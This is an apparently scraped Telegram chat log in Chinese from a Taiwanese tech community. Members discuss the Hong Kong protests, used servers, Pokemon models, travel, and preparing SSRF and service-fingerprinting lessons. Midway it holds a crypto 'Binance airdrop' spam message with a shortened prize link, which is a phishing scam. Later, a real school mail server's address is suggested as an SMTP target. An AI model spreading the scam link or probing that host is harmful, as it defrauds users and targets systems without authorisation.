Jump to...
redirecting...

Log for YSITD

Fine
乘法好難QQ
你在自己實作成法ㄇ
x86_64乘法
那是有優化的還是沒優化的那種啊
那是CPU的事吧
他要進位 然後看不同reg
好煩躁
就 大數乘法可以拆成加法跟乘法
Unison
https://github.com/unisonweb/unison
A language supporting transfer of computation
這也好酷喔
有種太陽花的既視感
真的
好可怕喔嗚嗚嗚嗚嗚
黃之鋒已經被關了,這衝進去就是直送中共監獄啊⋯⋯
[photo](media:AgADBQAD8KgxGxME6Vcf0QM97J8WWpL03zIABYpA909l0Xc8VgQAAQI@telegram)
塗裝的不覺得眼睛沒眼白好像不太對嗎
👋Hello everybody
🚀Significant event!
🚀Вinаncе-team opened Margin Trading Service!
🚀Вinаncе-exchange 👉OPENED AIRDROP amounting to 10 000 0000$👍
🚀🚀Have time to take your prize!
🚀🚀🚀Airdrop is opened!!!
✅GET PRIZE 👉👉https://bit.ly/2WZ2DYr
在點了啦ww
??
[photo](media:AgADAgADsKoxGzLv6UuO-NKeWokFZv6hhQ8ABExdkUuCuv2wQfsAAgI@telegram)
其實也蠻可愛的
[sticker](media:AAQFABN1IdsyAAQz9HsK8LoEVHoAAwI@telegram)
終於弄得好一點ㄌ
好擔心香港ㄛ
對欸
三天後飛會不會回不來啊 😰
不會好ㄇ
我在想要怎麼弄一堆libc的東西進來
你很安全啦
我昨天才剛撕掉台灣國護照貼紙
跟朋友聊天才發現
不然真的生命不保 QQ
[photo](media:AgADBQAD-KgxGxME6VfNMMDs2VS8NwVr3jIABAsCwQHoa6yUAuUFAAEC@telegram)
FB上有人說應該貼膠帶把盾牌黏在一起
早安
報平安
Im safe
你還在現場?
不久前離開了
辛苦了
你大概待到兩點多是嗎
2點左右吧
真的辛苦了
空白是正確的嗎
不正確
空白++
但是我用手機看是正常ㄉ
um
你們console有什麼東西ㄇ
[photo](media:AgADBQAD-agxGxME6VfaHT0NTOFERo-A3zIABIu1QYT2pW1Y7VUFAAEC@telegram)
[photo](media:AgADBQAD-qgxGxME6VfR6fnvuuHXZRxn3jIABK4HXB1q_lqqfNgFAAEC@telegram)
:D
沒BigInt的瀏覽器去死ㄅ
[photo](media:AgADBQADuKgxG6Jq6Fcrj76sbpnbDMpc9jIABJ0PeYKJSo4NWGAEAAEC@telegram)
你們那個看起來一臉FF的鍋
嗯?那為什麼 FF ao
!!!!!!!
!!!!!!!!!!!!!!!
打人ㄌ
!!!!!!!!!!!!!!!!!!!!!!!!
太陽花既視感
應該等等就上 CNN 了
你的FF真的有BigIntㄇ
好可怕喔
親中的怎麽都一個鳥樣啊
沒轍就打人
跟台灣不一樣的是他們被打之後提告訴也沒用欸
臺灣的提告到現在有用嗎?我記得還不是找不到打人的那個
好問題
好問題,我看要怎麽檢查
[photo](media:AgADBQAD-6gxGxME6VcPxtIEX9aL74lx3zIABKbYF-u21PhVBFwFAAEC@telegram)
好像沒有
你是67還68 www
67
難怪
快更新好ㄇ
(
[photo](media:AgADBQAD_KgxGxME6VcBQ8Cc2bOG8nd43zIABPjePplDXxC-L1sFAAEC@telegram)
我需要有人幫我implement各種instruction
[sticker](media:AAQFABO-j8oyAATxr7o8mBxJjBBNAAIC@telegram)
我弄好 OPass 之後或許可以幫你 (#
Objective-C -> Swift 5.0 挺煩人
這個清楚多了
好喔
基本上大學生最近都在準備期末考或是期末作業
Just saying (?
不衝突ㄅ
時間花在 A 就沒辦法顧 B 啊
RTHK居然只有FB直播沒有Youtube直播真不方便
就像現在我回訊息就犧牲我寫作業的時間(?
c能不能執行 動態的func
那你還不快滾去寫
為啥聽起來很像歌詞
什麼是動態的 func
名稱可以快速定義了
快速?
例如說 ['a', 'b', 'c'] 是個array
我可以跑 a[0]()
你上面說的什麼用 string 當 function 那個嗎?
pls don't
聽起來有夠JS
我覺得也很 PHP
a[0] 是啥
a= ['a', 'b', 'c'] (?
聽起來就不可能,我翻一下 standard
行ㄇ
還是只能透過marco做啊
然後你希望這個等於 a() ?
因為 a[0] = a ?
不行
不一定是要字串啦(?
任何編譯語言應該都不行
他只要能指到func都好
用指標幹應該可以
在 Array 裡面放 function pointer
我等等試試
++
[photo](media:AgADBQAEqTEbEwTpV1CE_cyerEpNQVD2MgAEyPa2MsQTc8UuXgQAAQI@telegram)
不太懂你的意思
希望香港不要出人命都好
我要來去睡覺ㄌ
香港掰
我覺得他們下次應該要有好一點的對策 (?)
@licson 建議你讓我看到你明天飛往台灣的單程機票
最近好像還有一次ㄅ 反送中的
今天 10 號
12 號就要二讀
過了就過了 到時候更可以當作那參與的 100 萬人是罪犯遣送
實在不知道香港人怎麼抵抗
好可怕喔嗚嗚嗚嗚嗚
12 號審
只剩 今天明天跟 12 號當天
昨天的 100 萬人就這樣鳥獸散
這 3 天有辦法規模更大,阻止通過嗎
😢
@licson 你要堅強
幹據說警察裡面有解放軍
你不睡覺早上沒問題ㄇ
能猜得到吧
我準休學狀態
?!
個人因素
我也想要準休學
我只有準被當狀態 QQ
你想的話你也可以ㄚ
你也可以在裡面放個閉包?
不然尼也可以用 std::bind
假設你在寫 C++ 辣(
為什麼群眾們那麼
和平
是說可能有點無禮,可是可以問什麼因素嗎?
因為
沒救ㄌ?
不方便ㄟ
:(((
PTT一堆人在嘴他們散步
他們只要版面
沒有要抗爭的意思ㄅ
木已成舟?
🤔
奇怪香港要這樣搞怎麼不革命比較快
全香港人走出來散步幹嘛
香港人真的有照吞的打算喔
:(
你可以用pointer🌚
不能
但你自己寫jit可以😂
辛苦曬
不要挖苦香港人了,昨天很多内地新移民和深圳人都参加了
我们退无可退了
幫QQ
是說早上如何
沒有如何 凌晨就散的差不多了
這三天還有規劃類似的活動嗎?
12應該有
那天要馬就通過了或是沒通過
能改變嗎
而且通過後再抗爭不就是有機會讓中共當作是罪犯引渡
😱
@S_ean 早安同事提到你惹
他有種引渡100萬人(
抓 100 個殺雞儆猴 就怕了
沒這麼弱啦
要說抓100個 他們早抓了100個了
昨天那麼多人都沒結果了
完全不覺得 12 當天可以做出什麼改變
他號稱是不引渡政治犯啦
但是事實ㄏㄏ
[photo](media:AgADBQADrqgxGxME8VfaMp2z0dMpgWJ_3zIABHxByuI8Rj4CJ0wFAAEC@telegram)
上次去ㄘ過ㄌ
真好
我在爆肝你們在吃吃
[sticker](media:AAQFABPmcNMyAASV5H2deWmgU7YDAAIC@telegram)
昨天香港在反送中
中時在幹嘛
[photo](media:AgADBQADr6gxGxME8VeoqjP4VP9bqVpo3jIABGaPKi2JzdjUPeQFAAEC@telegram)
日常
可悲
我可以帶泡麵給你(x
雖然不知道哪些能帶回去 owo
喵嗚w
沒肉塊的都行
誰知道他有木有肉塊(?
都沒有ㄅ
聽說一風堂不行 oao
沒救了
台灣只有一個報紙還在睡
香港全都在睡
蘋果好的啊
明報今天也有吧
上面就有明報
[sticker](media:AAQFABMEErIyAATTddJ0Y7mhVpQgAAIC@telegram)
[sticker](media:AAQFABMnA74yAARH1lhk8LFKzrcCAAIC@telegram)
亞洲ㄉ金融中心
接下來會到哪
新加坡我猜
朱立倫怎麼ㄌ
那是昨天的吧
高雄
他們都挖到石油了
[photo](media:AgADBQAD46gxG4nd6FeihQPu6qy7s-1N9jIABCS0Z4Jygxw4DFwEAAEC@telegram)
還有人要ㄇ(x
其實我覺得是東京欸
你組的喔w
我搞不懂你是開玩笑還是認真的了(?
認真
就 雖然日本已經在谷底了 但不可否認他們在經濟上還是很強勢吧
也許會衰退或進步,但要當亞洲最大金融中心,我覺得日本還是有可能
Hmmmm
可是為什麼其他國家的錢會寧願過日本也不過香港?
買ㄇ
就一個
別人的爛還是比我們好 的概念
我發現我沒左邊那組
其實我看不懂那是組好的還是
那是很早期的
所以早就沒ㄌ
香港的領導地位一直在衰退啊
你是說當衰退到跟日本差不多的時候,就沒理由選擇香港了嗎
嘛 也不能這麼說啦 就 市場慣性
我想想
當然ㄅ4ㄚ
我在新宿當ㄍ宅(x
ww
那是組完ㄉ還是有沒組ㄉ
(還沒醒
@seadog007 你還欠我有個紙雕(
照片4組完ㄉ
可4賣沒組ㄉ
正常ㄅ
[photo](media:AgADBQAD36gxG4nd6Fet7YGYj3bylFlV9jIABI7OmINklPhyyGUEAAEC@telegram)
那個很簡單啦
你 迷路了ㄇ
其實我的癥結點只是因為左邊那組官方沒貨
多少R
[sticker](media:AAQCABN8Q0sNAASK-jqtIqWZciqaAAIC@telegram)
kimi no (ry
幫我組(O
[photo](media:AgADBQADrqgxG07u8VfZvUtibOz8XVpd9jIABIvtwrCwoyq6Il4EAAEC@telegram)
對照一下
@seadog007 jㄍ是你沒有的(?)
各幫我帶
[photo](media:AgADBQADsKgxG07u8VeIQNkO-ZeqDip93zIABFtSmD-8FICYhlkFAAEC@telegram)
皮卡丘伊布各一
[photo](media:AgADBQAD4qgxG4nd6FfksnHkTy0Gidd-3zIABOGorIUAAVaXae1TBQABAg@telegram)
還有進化ㄉ
@seadog007 記得幫我組
乾真的是仗著沒貨QQ
[photo](media:AgADBQAD3qgxGxME8VcSufTvQi6dgo1S9jIABOqj0bAlUU4xuFUEAAEC@telegram)
好ㄅ那皮卡丘
我沒看過這個耶
沒看過這個版本,可是我覺得還好
沒 他本來就爆炸貴
我也沒看過(?
我覺得彩色比較好
他還有其他 pokemon 系列的ㄇ
pikachu 那個很便宜(
[photo](media:AgADBQADmKgxG0ns8Vdg_mbwQf6hYTpo3jIABKh42H2mTGHxXOoFAAEC@telegram)
層數不一樣
都大概6層
可惡,沒有白鬼夜行
不才不止
六層是主要的框
至少有20層
[photo](media:AgADBQAD36gxGxME8Vd2AbAfbApKmwl23zIABIHI04sPCaI7TFsFAAEC@telegram)
喔好像很多 www
每一層還有一堆細項
海豹組過
[photo](media:AgADBQAD4KgxGxME8VcTuYgc_DDHrSRP9jIABDoPVA7KgAPZ1WcEAAEC@telegram)
第二層左一的皮卡丘
第一層左三的伊布

兩種各一w
[photo](media:AgADBQAD4agxGxME8VclappVf7fg7ERe9jIABOgFxPnJW2S98FsEAAEC@telegram)
這也太複雜
嗚嗚嗚嗚我沒買到
雖然買到我也組不起來(
[sticker](media:AAQFABOtkPYyAARsURlozFShWqdvAAIC@telegram)
光中間那隻就九層了ww
太寫實ㄌ
@WilliamMou 感恩你(?
[photo](media:AgADBQAD4qgxGxME8VdMF-1U0dNmcWnv3zIABAd4cORmrM--mF0EAAEC@telegram)
[photo](media:AgADBQAD46gxGxME8Vc4aqucPw8oAAGS9N8yAAQ8y65H0d6XdbhZBAABAg@telegram)
弄爆幹久
[sticker](media:AAQCABN8Q0sNAASK-jqtIqWZciqaAAIC@telegram)
我拼一定失手QwQ
[sticker](media:AAQFABOtkPYyAARsURlozFShWqdvAAIC@telegram)
我也有失手R
我會大失手(
(手殘一族
[sticker](media:AAQFABOtkPYyAARsURlozFShWqdvAAIC@telegram)
我希望我有在做紙模型可以穩一點(x
[photo](media:AgADBQADSqgxG9DG8VexO4bVAQyrkjZx3zIABC4trmSchDSxM1oFAAEC@telegram)
[photo](media:AgADBQAD5KgxGxME8VeqyKvqDsVaa3Dw3zIABPuq3hE7WPinlV0EAAEC@telegram)
賢人畢竟能是薔薇花在荊棘之路上盛開 <- 這句是什麼意思
先不問涵意 我光連字面都看不懂了
哪來的啊
[photo](media:AgADBQAD5agxGxME8VcM_HMeAobrinds3jIABGKJfUH2-nkpI-YFAAEC@telegram)
[photo](media:AgADBQADsqgxG07u8Vdsb_d_e9lzUmBd9jIABEWMahvRSWqZQ2cEAAEC@telegram)
直翻的
有人把「使」打成「是」
然後他媽的就一堆人也跟著錯了
現在網路上用「是」的可能佔了四成
[photo](media:AgADAgADuKoxGxQ_8UtOW0wam_woP_VEXw8ABM5hJ5ZjdB9jA9kFAAEC@telegram)
[photo](media:AgADAgADt6oxGxQ_8UtOOizloGi7G8duXw8ABARQ-1OvwI0JRdAFAAEC@telegram)
[photo](media:AgADAgADuqoxGxQ_8UvGc1jOLmGXFEQ_hA8ABHqUJDt-7XRLRbcBAAEC@telegram)
[photo](media:AgADAgADu6oxGxQ_8UtHlAOr_ZBT-L-6UQ8ABEqh4RtTmkdsnUgEAAEC@telegram)
很正常阿,我還遇過那種大家都說是殷海光說的,結果我去圖書館找了原著發現根本沒這句話
幹 超低能 ==
酷欸,Yamaha 跟 Gogoro 合作的電動機車出來了
庫欸
是說 Gogoro 目前有進國外了ㄇ
歐洲
沖繩
不過在歐洲那邊是偏向共享機車的形式
可能因為日幣很穩
香港好危險之類的
哪裡穩ㄌ
🤔
三不五時被灌爆變雲霄飛車的貨幣很穩…?
[photo](media:AgADBQADyKgxG8A06Fc9P72VYNFNEHBN9jIABAJ_YNjPGR8dwVsEAAEC@telegram)
佩服
可以,這很瓦斯爐
但是塞不下顯示卡 🤔
AMD 可是藍光…?應該紅光才對吧(?
人家是 rgb
可以調的
對,那個風扇超七彩霓虹燈
不過我沒買透明機殼
沒啊 你家瓦斯爐是紅的?
因為他放在我床位旁,很亮
可是 AMD 是紅的R(?
[photo](media:AgADBQADL6kxGxME8Vcdvt8vbd3Kr-5b9jIABEOwKgPUH0FNZV4EAAEC@telegram)
修好ㄌ
[sticker](media:AAQFABMZcMoyAARyMPAgvDU6Q0c-AAIC@telegram)
台南突然暴雨 ==
換南部要開游泳池了
你的 wifi 還是啥也修好ㄌㄇ
感應?
喔對耶忘記這個也壞了
就螢幕啊
嗯嗯
被你越摔越慘ㄉ那隻
[sticker](media:AAQFABNnqfYyAAQaPFZaCdQ-oq5dAAIC@telegram)
台南雨好大
還好我離開ㄌ
聲音像是有人拿著整桶水往窗戶潑
台北剛剛也很大
我才剛從學校回家,整個背後都是濕的(名符其實的濕背秀)
是說我包包沒放輕便雨衣也沒放雨傘
好險我剛剛出門兩個都有帶,雖然身體還是濕了
人家戰敗國,沒那麼容易成為中心
雖然台灣連是不是國都不好說 🌝
我可以不用再留卡去日本開戶嗎?
我好奇這一點
一般是不能
不過香港可以光靠護照開戶
我不覺得日本會願意這樣開放耶
我還是覺得新加坡
對,我剛剛也質疑這一點
如果無法讓外國人開戶
我覺得還是跟香港有差
是說,開戶了是表示要繳稅嗎?
如果真放錢進當地帳戶
不用啊
[photo](media:AgADBQADaakxGxME8VcD--BDMNhXQ3n03zIABNubWdbGV61CD2EEAAEC@telegram)
阿貓專業考古
@koru1130 你看
我以前居然都在玩先行版 怕爆
吊魚
我以前都只會發廢文
[photo](media:AgADBQADeagxG8nW8FdOxzjlCHdeenX03zIABOGa_mCBUA3nHl0EAAEC@telegram)
從小就會吊魚 黑黑
[sticker](media:AAQBABNrtOcvAASVBJ_oF2mH_PUBAAIC@telegram)
那你要來懷舊玩TPPI2嗎
機掰人
沒空啦幹
無縫接軌到八月了
太厲害了
說好的暑假
7/23~28有空
8/14回台灣
突然覺得我是不是得自己去了QQ
還好我都不是Conf工人
不然兩個禮拜又去了
出什麼國,填坑比較實際🌚
你就 行程時間訂好 我很樂意在我生日那天飛
你到底在考什麼古la
不知道 突然點到一個地方就跳出來你那張照片
沒特別翻
很可愛 🙈
看看海豹現在變甚麼樣子(
了解
不要,我要出國
呃?原來你那時候生日嗎
1006 ㄅ
那時候應該沒工作ㄌ(?
沒錢QQ(#
[sticker](media:AAQBABNrtOcvAASVBJ_oF2mH_PUBAAIC@telegram)
滾 虧我還記得你生日
[sticker](media:AAQCABPxGUsNAASL-J1Ol87XJ7GSAAIC@telegram)
我ㄋ我ㄋ
1130
(?
好厲害ㄛ
靠邀你們都ID啊
我ㄋ我ㄋ
0223
1230
1130
0603?
我呢(
0427 (#
那0603是誰(
這個嘛 問當初的我為什麼要用 0603 ㄅ
所以到底什麼時候R
算了好像翻 FB 最快
哦哦哦小時候好可愛哦哦哦哦哦
我ㄋ
真的,一臉機掰樣(?
老了老了
我最喜歡的捏臉
0907
如果我見到小時候的海豹大概早就捏下去了
[sticker](media:AAQFABMEErIyAATTddJ0Y7mhVpQgAAIC@telegram)
好哦真的是這天(
我喊了出國不知道喊多久了,然後我最討厭光說不做,所以我要出國(
三小啦 才不是1006好ㄇ
@seadog007 為什麼你生日是1006ㄚ
明明就1005 QQQ
你們這群臭87
QQ
[sticker](media:AAQEABPc52EwAASWPv02AAG9DJM1DQACAg@telegram)
哦... FB 時差(
[sticker](media:AAQFABOtkPYyAARsURlozFShWqdvAAIC@telegram)
好好好我記得了 1087
好啊原來你不知道我生日
QQQ 我只記得三個字(
跟十月
最近腦袋都被裝別ㄉㄌ
我有寫在行事曆上(
[sticker](media:AAQFABOtkPYyAARsURlozFShWqdvAAIC@telegram)
我的呢(?
三個字?
你們又沒設成ID 也不是對我太重要ㄉ人
乾我P4
我以為這應該要有點像反射動作(?
就不夠在意的人才不會記生日
QQ
不找你出國了(不
我以前會記得
所以為什麼你生日是1005ㄚ
我要去Meeting了啦煩死
可是後來對這個越來越記不住
不要亂帶他出國啦
都帶壞了
(連自己爸媽生日都差點忘記
你什麼時候要逃難
那才不是我的問題好嗎
只記得大概
然後有人沒管我
那你自己的ㄋ
暫時不用啊
都寫在 ID 上ㄌ
慢慢觀察
為什麼不乾脆在1234出生
不要搞這麼誇張好像世界末日這樣
某種意義上來說,知道不寫在 ID 上的人的生日感覺比較有趣(?
你怎麼還沒被揍扁啊
[sticker](media:AAQFABNWdsoyAASvsUMG5FawX89UAAIC@telegram)
你可以ㄅ要再次機他ㄌ(
go
欠扁啊
[sticker](media:AAQFABPk5vcyAAQLRFcltPQAAd5gNwACAg@telegram)
不記得他生日這件事情
就多了一點老了之後才有的嘴臉齁
隔壁的人在聊送中條例ㄟ
[sticker](media:AAQFABMP8LEyAAQX3evHthM8Tvc5AAIC@telegram)
你還有四個月的時間想怎麽補償這件事(X
我覺得你一直在罵我
[sticker](media:AAQCABN8Q0sNAASK-jqtIqWZciqaAAIC@telegram)
[sticker](media:AAQFABMLdt4yAARvilumk1-UDrwbAAIC@telegram)
你現在圓臉變尖臉了
沒那麼可愛
ww
www
我去年有準備生日禮物給他(
他沒給我(##
大概把自己先吃胖有機會變回去(O
在新竹一天又繼續爆肝應該是很難
我比較喜歡現在ㄉ樣子就是ㄌ(
討啊(X
玉山巍峨
委屈毛(?
幹沒空生教材了
甚麼教材啊
晚上要講課
我快死掉了
嗚嗚嗚
[sticker](media:AAQBABN1JtQvAATde6D7VZMdvhNQAAIC@telegram)
明天期末考
大教授
還有專題要弄
好好喔我也想當大教授加博士先生 :(
是說 @seadog007 TPE <-> NRT 這種短程的還需要計較什麼嗎
還是直接丟 Google ITA 找機票就好了
喔幹明天還有一個期末報告
不睡覺
yay
[sticker](media:AAQFABOtkPYyAARsURlozFShWqdvAAIC@telegram)
恭喜你回歸大學生生活(校
國泰 日航
什麼意思?
就這兩家啦
Oh OK
航空公司
國泰不是在特價嗎 不過要兩個人
[sticker](media:AAQFABMWmdYyAASYnHS9XWeCIx0tAAIC@telegram)
然後好像有兩人優惠 不知道還有沒有
不衝突ㄅ
基本上大學生最近都在準備期末考或是期末作業
不過這條線我只搭過全日空與日航,不知國泰有啥推薦點?
我想比較一下
你想表達什麼(?
密度很高的話就衝突了
[sticker](media:AAQFABMHn_YyAASPwOd7sxQvskpfAAIC@telegram)
[sticker](media:AAQFABP0XMoyAARgO44vm9Ecd8ZKAAIC@telegram)
+1
你要不要去撞牆啊,你好煩好欠揍喔
認真不行 會搞壞身體
加博士4誰
:(
我昨天沒睡 yay
你也是喔 不要不睡覺
你也是喔 不要不睡覺
迷U是你今天真的很欠揍
我只是每天晚點睡覺都搞壞身體了
[photo](media:AgADBQADxqgxG07u8Vcj8aWDCNuicANR9jIABMT2Ygz5NvUYk2UEAAEC@telegram)
:(
[sticker](media:AAQFABNMXL8yAAR7YyLQUUTLlr0eAAIC@telegram)
玉山巍峨
碧海浩蕩
@seadog007 你的古文觸及率真高
@seadog007 我也想要多彩多姿的童年
[sticker](media:AAQFABOdiPYyAASVrPgocBwRfTNrAAIC@telegram)
[sticker](media:AAQFABMHn_YyAASPwOd7sxQvskpfAAIC@telegram)
[sticker](media:AAQFABOLkMsyAATlerfU-o5A3PcMAAIC@telegram)
[sticker](media:AAQCABMf44IqAAREU7iOrl4bzsYwAAIC@telegram)
東京有什麼好玩的啊 沒去過
東京鐵塔
晴空塔
逛逛 新宿 池袋 上野 也好
[photo](media:AgADBQADC6kxG4nd8FfvYTM_GfePvQnx3zIABLfhkONDJviWuGEEAAEC@telegram)
很舒服的
現在還有沒有築地魚市場
好像搬了
我主要都是吃吃吃
[sticker](media:AAQFABOfLdAyAATKmqefMh46rtNMAAIC@telegram)
搬了嗎
嗯啊
我七月初才要去的欸
我有排那邊
:(
要搬了
🤔🤔🤔
🤔
是拍賣會搬
食肆的話應該繼續留在原地
yay
二戰都 80 年惹 ==
雖然之前修憲有些風波啦 Zzzz
@k1tten RRRRRR 怒ㄛ
晴空塔好貴
我到現在還沒進去過
近郊東西比較多
诶我還是想去東北晃晃,雖然大概會很貴
@TsundereChen 誒欸欸欸欸
誒欸欸欸欸欸欸欸欸
影響還在阿
三小?
聽起來像什麼炸了
八台Server入手
14 (笑
靠邀喔
484都被這裡的人拿完了
你不炫耀我還不想說(
啥東西
是說你拿什麼類型的啊
你們好兇喔XDDD
Dell 那個各 6
IBM 2
XDDD
同學變國手ㄌ
:(
你也太兇._.
??
幹我還在用 Q6600
可憐我一下好嗎
給我各一台行嗎(
???
啊?
Dellㄉ
甚麼規格
什麼價錢
可以啊, 價格 x10 後我就寄
垃圾可以玩
不是 你們怎麼入手的
我也要搶
@seadog007 老實說我覺得還不如低調(
偷拐搶騙?
我自己去搬(?
Dell 甚麼型號啊
有沒有拍賣連結
我只跟他要一台還要不到
是不是應該要多一點比較有機會
:(
什麼啦為什麼我不知道你們在講什麼
又沒人會去搶你(
其實應該不是這個問題(
377
++
只是有種炫耀感覺不太好(
然後等等又被閒言閒語很煩WW
[sticker](media:AAQFABMHn_YyAASPwOd7sxQvskpfAAIC@telegram)
嗚嗚
我也要
[photo](media:AgADBQADVKgxG9DG8VcqS8JTilZyU8Ft3jIABPZczWaL1Mi9q_MFAAEC@telegram)
求解
你們到底
哪裡有 server
在講啥
[sticker](media:AAQFABO21d8yAATXjVOKGJHUYat9AAIC@telegram)
我專業管主機喔
甚麼型號啊
權限快開給我
忘了
我家的很好ㄚ
我也不知道為啥一回來就變這樣 :(
我只拿各四真的太少了Q
別嫌ㄌ
有拿到就不錯ㄌ(?)
[sticker](media:AAQBABM7AAEUMAAEILpcmecgiShCNgACAg@telegram)
一個人拿各四嫌少?
你看看你(
人家是社團
你是個人用途ㄅ(
所以是甚麼型號啦
[sticker](media:AAQFABPlo7MyAARvwKQNwwmtkc2lAQABAg@telegram)
到是他居然十四\就給下去也是很狂
已經說N次忘記了啦
想起來啊
他可能 很認真寫用途
就說低調QQ
[sticker](media:AAQFABOLkMsyAATlerfU-o5A3PcMAAIC@telegram)
這倒不否認,我是有規劃可是沒機器(
讓我看看是不是好康
低調啥
他真的很認真
有機器就應該好好來玩啊
R710 🌚
不要了
eww
話說
他的運費4ㄅ4
降了XD
我只寫了 儲存叢集建置
六個字
R410 更髒 根本電子垃圾
對,有降
那CPU根本只能當儲存ㄅ
我買來也只能換個 CPU 再出租
1U 的沒辦法這麼做吧?
可以阿
2U 或許還有機會
R710 是 2U
R410 可以插四隻碟
X3550 呢 忘了
所以你要拿來幹嘛R
給社團成員練習管機器ㄇ
替換 Q6600
對啊,買機器蓋 Cluster 啊,沒辦法,我窮(
你不是有HP ML系列
要不要我賣你一點機器
那是個人用途,跟社團無關
六台 HPE DL360e Gen8
再說那有一臺不是我的
XDDD
LFF 版本的
所以是什麼叢集R
\Kubernetes/
\Kubernetes/
最近想玩 k8s
還用問嗎
你還真會猜
(
下一個應該是 OpenShift
好ㄉ 完全沒興趣(O
每台 兩顆 E5-2450L + 32GB 記憶體
我要來認真想用途了
那你規格要再上一個層級
這些機器應該完全不夠力跑 OpenStack...(
cluster fuzzing (X
反正機器買來可以慢慢 Upgrade
www
然後沒人管我
沒機器連 Upgrade 都不用想不是嗎
可是他看起來升級很有極限
是說我機櫃應該會遇到障礙
升級有其極限,但機器數量沒有
喔?
12U就這樣被佔滿ㄌ(
總比 Q6600 還好吧(
垃圾到不那麼垃圾
對,說到這個...我得買機櫃了
我版版拆不掉QQ
又不是整個塞滿
但是你單台這規格實在很難用
連我現在用的電腦規格都不到耶
到底是啥 server
SRE 是不是呼吸都在燒錢
那是練習用ㄉ好ㄇ
let me see see
@TsundereChen 你要不要機器
看上面松鼠那個 excel
@cras4202tw 就垃圾
你覺得呢(笑
喔喔
我賤賣誒
你看起來很想買
數量都 0 不是ㄇ
整個人都想買了起來
啊就 被我們領完了
我覺得我得比賤更賤才能買你的機器(X
就說入坑OKTW
這裡應該還有人有機器沒說話我猜(
@licson 你的那台Switch能好好發揮作用了(
慘 gen 11 完全沒興趣
我也這麼覺得
一步一步慢慢來嘛,我又不是 OKTW 有好棒棒金主贊助主機
窩撈ㄌ一台
但是我也忘記我撈了啥
你全部買 ConnectX-3 雙口卡
只有我沒有 嗚嗚嗚嗚
那樣更爽
滾 你出錢
@seadog007 你晚上的教材
好了沒
正在生
聽起來🤔
剩20分鐘
幹幹幹
www 那還嫌聊
快去la
現在簡報還不到20頁
FK
那去趕教材啊
還煩惱 Server
[sticker](media:AAQFABMEj8oyAATGEMLGXyJkFKZbAAIC@telegram)
反正機器又跑不掉
我是覺得比起升級那些主機,直接堆一台新的比較划算
我才沒有煩惱(
當然
沒叫你買 Connect-X 4 算是這樣啦
喔,再去撿張顯卡就可以當player惹
還是比較喜歡新ㄉ
又沒人說不能同時計劃
[sticker](media:AAQFABOLkMsyAATlerfU-o5A3PcMAAIC@telegram)
你這是浪費錢
當然一次攻頂最便宜啊
ConnectX-3 是 Mellanox 還在支援又可以拾便宜二手的卡誒
Apple:
信仰也是要算在價值裡的啊
反正我沒有信仰
可是我沒有
[photo](media:AgADBAADkqkxGxnG9FMN-G9_Xs1XD1E6sRoABI4t5YC-VPQyORwCAAEC@telegram)
我喜歡不用錢ㄉ
(X
HPE ProLiant DL580 Gen10
想像一下全部都是 NVMe 碟
這批算便宜了吧,都已經只付運費了
[photo](media:AgADBQAD66gxG1DigVccQaRWhZcc3sJu3zIABC3ySXFSMHoBO-QEAAEC@telegram)
這台啊
不要 ruler
而且我有 V9000 了
這能 1U 512T 誒
超屌
所以我說我喜歡不用錢的啊
我 V9000 也可以啊(
還可以建 SAN
1U?
4U
這就是差 4倍阿
我決定來集思廣益
密度比你高
4台這個就 2PB
你是要問我看不看的懂還是要我 Debug
前者可以後者絕對找錯認
挖,你居然講這ㄇ難ㄉ東西(
才 20000 台幣一台誒
還有保養
我要有人幫我找素材QQ
有沒有什麼範例題目
不然我就要從docker開始教了喔
等我幫你
☺️
聽起來很便宜
為什麼
你只剩下 17 分鐘可以幫他
我覺得你找錯人
因為ssrf題目都用docker包
可以阿(
跟我全買的話 十萬台幣
我總不能架給他們(
幫我Google啦
我覺得沒什麼不行的WW
架環境很重要(????
找好ㄉ題目
沒空QQ
等等要開會
看簡報想到淒慘的 Pre-exam QQ
13 14有什麼差別
Fixed
@TsundereChen 你看看不懂也能幫忙
[sticker](media:AAQFABN7S94yAASCjjFZa7Iu28JmAAIC@telegram)
9 10 locahost
那不是故意的嗎
[sticker](media:AAQEABOJi-8ZAAQScrTtrHOjSXojAAIC@telegram)
是說這種東西還不簡單防,把lo拔掉就好了啊(X
求個FTP站台
不客氣
你太慢ㄌ
[sticker](media:AAQFABMEErIyAATTddJ0Y7mhVpQgAAIC@telegram)
還有什麼服務可以fingerprint的啊
http不就可以了,人家nginx不是會塞header
php也是啊
minecraft也可以(
不行
有價值點的服務好ㄇ
DNS(幹
TCP only
求smtp server
port?
好我寫滿一頁了
下一頁QQ
140.131.149.3:25 吧(
沒被動過的話(
這個W
我也沒有QQ
師大附中的 Mail server
[sticker](media:AAQFABMc4tQyAATHFnijwNFWnYUrAAIC@telegram)
你為什麼會去背
幹幹幹六點半ㄌ
要付電費太垃圾不行
雖然都不是我付的所以無感🌚
[sticker](media:AAQFABMEErIyAATTddJ0Y7mhVpQgAAIC@telegram)
只好靈機應變ㄌ
QQ
[sticker](media:AAQFABMlmt8yAATUNMTd5F6UabJOAAIC@telegram)
🤔
七點半ㄌ 太陽還沒落完
等縮時好無聊(?
🤔
你現在在哪個機場喝啤酒(?
根本欠揍
我在札幌玩ㄌ
怎麽會,這根本是超棒的 HR 廣告
看,在我們公司上班的話,你整天都在國外玩耍呢
這種感覺(X
並沒有
誰管你國外,身為宅宅當然是待在家裡就能賺錢才好啊
[sticker](media:AAQFABMEErIyAATTddJ0Y7mhVpQgAAIC@telegram)
看看Henry 看看David
我覺得有(O
你現在該出現在這裡ㄇ(
那你還不趕快去投履歷(????
欸靠 我等了 45min 了喔
我決定遲到一下
(O
www
:O
不要這樣 我窮
而且帶保養
值得這個價錢
全球保固?
官保
早知道就不填一台了owo (
所以你要不要
幫我清庫存
我去找你大概八小時就到了(x
搭飛機比較實際
日本應該可以用任意門(x
[photo](media:AgADBQADWKgxG9DG8VfCcnCuSPfewj103zIABKEQ2YuxF0hNv1cFAAEC@telegram)
去找這個)
看起來有難度 QQ
[photo](media:AgADBQADcakxGxME8VfKbi6MQ5As7mx83zIABBm96lGCdFeXCFQFAAEC@telegram)
幫QQ
有什麼什麼的 pokemon 一番賞剩下的東西ㄇ(
可是感覺崩崩ㄉw
[photo](media:AgADBQADcqkxGxME8VezVs-zn-946oCB3zIABD0MIp655QJG_WEFAAEC@telegram)
有很多愛米莉亞(x
這邊貌似剩下這隻 eevee 了~
他好可愛ㄛ
ww
帶ㄚ
@Ti_wb (?
300塊的大伊布ㄛ
沒買行李ㄚ
手提 7 kg(
立馬買(X
然後就虧本ㄌ
